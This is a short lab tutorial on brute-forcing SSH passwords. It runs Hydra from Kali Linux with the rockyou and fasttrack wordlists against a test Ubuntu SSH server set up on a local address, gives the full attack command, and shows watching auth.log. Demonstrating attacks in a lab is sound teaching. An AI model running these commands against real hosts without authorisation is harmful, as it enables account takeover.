The brute force attack seems too noisy and obvious to actually exist in the real world one might say. The test for this is fairly simple. Disable the firewall, enable a service the depends on password authentication, then tail the auth log file to look for password attacks. Unfortunately, there will be thousands of attempts for login by thousands of different IP addresses. Brute force password attacks are a constant threat to any host that uses password authentication.
To demonstrate, use the Hydra parallelized login cracker on Kali Linux against an SSH server on Ubuntu Linux.
Hydra requires a wordlist to perform the attack. A wordlist is a file of strings to use in a brute force attack against password authentication. Kali Linux includes several wordlists to get started, but they need to be decompressed before using them. They can be found in /usr/share/wordlists. The fasttrack list is short and the rockyou list is much longer.
Decompress the wordlist:gunzip /usr/share/wordlists/rockyou.txt.gzCount the number of words in the list:wc /usr/share/wordlists/rockyou.txtView all words in the list:
cat /usr/share/wordlists/rockyou.txt
Create an SSH server on an Ubuntu participant, as an SSH server is required.sudo apt-get install openssh-serverStart the new server:service ssh startCheck the status of the new server:sudo systemctl status sshCreate the elle user:sudo adduser luserTest the SSH server with a good username and password:ssh luser@192.168.1.13
Before starting the attack, follow the authentication log file on the Ubuntu host. This allows real time view into the attack.tail -f /var/log/auth.log
Use Hydra to launch a brute force attack against the SSH server. This initiates four worker threads to attempt ssh logins on the 192.168.1.13 server using the fasttrack wordlist. It will only attempt logins with the username, luser. hydra -V -f -t 4 -l luser -P /usr/share/wordlists/fasttrack.txt ssh://192.168.1.13
If the password for the luser account was not in the fasttrack wordlist, perhaps find a better wordlist.
Voila